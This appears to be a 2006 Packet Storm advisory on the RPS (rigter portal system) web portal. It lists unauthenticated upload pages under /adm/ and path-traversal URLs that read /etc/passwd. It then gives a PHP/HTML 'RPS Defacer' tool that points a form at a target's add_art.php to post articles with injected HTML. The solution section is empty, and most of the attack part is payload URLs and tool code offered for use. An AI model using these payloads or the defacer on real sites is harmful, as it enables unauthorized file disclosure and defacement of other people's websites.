rps-include.txt

2006-07-24T00:00:00
ID PACKETSTORM:48437
Type packetstorm
Reporter zeus
Modified 2006-07-24T00:00:00

Description

                                        
                                            `###########################################################################  
# Advisory #13 Title: Multiple Vulnerabilities RPS (rigter portal system)  
#  
#  
# Author: 0o_zeus_o0 ( Arturo Z. )  
# Contact: zeus@diosdelared.com  
# Website: www.elitemexico.org  
# Date: 18/07/06  
# Risk: medium  
# Vendor Url: http://rps.rigtersir.com/  
# Affected Software: RPS  
# Non Affected: RPS V 4  
#  
#Info:  
##################################################################  
#UPLOAD FILES  
# it allows the user to raise archives without having administration  
privileges  
#  
#  
#SQL inyección  
#it allows the user to insert post without having to be admin with this can  
make xss or  
#HTML injection  
#  
#  
#example of upload files  
##################################################################  
#  
#http://www.vuln.com/[path]/adm/photos/images.php  
#  
#http://www.vuln.com/[path]//adm/down/files.php  
#  
##################################################################  
#example Remote Execution  
##################################################################  
#  
#http://www.vuln.com/[path]/index.php?id=../../../../../etc/passwd  
#  
#http://www.vuln.com/[path]/index.php?id=../../../home/victim/public_html/index  
#  
##################################################################  
#  
#Solution:  
##################################################################  
#  
#  
#VULNERABLE VERSIONS  
##################################################################  
# v1.0, 2.0 3.0  
#  
##################################################################  
#Contact information  
#0o_zeus_o0  
#zeus@diosdelared.com  
#www.elitemexico.org  
##################################################################  
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico  
#  
#Original Advisory: http://zeus.pccentervillaflores.com//13.txt  
##################################################################  
  
SQL inyección in "Articulos" exploit  
  
<?php  
/*  
RPS Defacer by: 0o_ZEUS_o0 OliMpusKlaN •~ FX ~•  
Date: 08/01/06  
Website: www.elitemexico.org  
*/  
?>  
<html>  
  
<head>  
<title>RPS Defacer</title>  
</head>  
  
<body text="#FFFFFF" bgcolor="#000000">  
  
<p align="center"><font face="Verdana" size="2"><b><u><font  
color="#FF0000">RPS Defacer<br>  
<br>  
</font>  
</u><font color="#FF0000">0o_ZEUS_o0 OliMpusKlaN <br /> •~ FX  
~•</font></b></font></p>  
<form method="POST" ACTION="?action=enviar" name="rps_defacer">  
<center>  
<table border="0" cellpadding="5" cellspacing="0"  
style="border-collapse: collapse" width="40%">  
<tr>  
<td width="100%"><b><font face="Verdana" size="1">Direccion:<br>  
<input type="text" name="url" size="30"  
value="http://"></font></b></td>  
</tr>  
<tr>  
<td width="100%"><b><font size="1" face="Verdana">Autor:<br>  
<input type="text" name="autor" size="20"></font></b></td>  
</tr>  
<tr>  
<td width="100%"><b><font face="Verdana"><font size="1">Email:<br>  
<input type="text" name="email" size="20"></font></font></b></td>  
</tr>  
<tr>  
<td width="100%"><b><font size="1" face="Verdana">Titulo:<br>  
<input type="text" name="titulo" size="30"></font></b></td>  
</tr>  
<tr>  
<td width="100%"><b><font size="1" face="Verdana">Contenido:  
(Soporta  
HTML Inyection)<br>  
<textarea rows="13" name="articulo"  
cols="55"></textarea></font></b></td>  
</tr>  
<tr>  
<td width="100%">  
<p align="center"><b><font face="Verdana" size="1">  
<input type="submit" value="Enviar" name="send">  
<input type="reset" value="Restablecer"  
name="delete"></font></b></td>  
</tr>  
</table>  
</center>  
</div>  
</form>  
<?  
  
if($action=="enviar"){  
  
$web= $_POST['url'];  
  
echo "<script LANGUAGE=\"JavaScript\">  
  
var pagina=\"$web/adm/add_art.php\"  
function redireccionar()  
{  
location.href=pagina  
}  
setTimeout (\"redireccionar()\", 0001);  
  
</script>";  
}  
?>  
  
</body>  
  
</html>  
`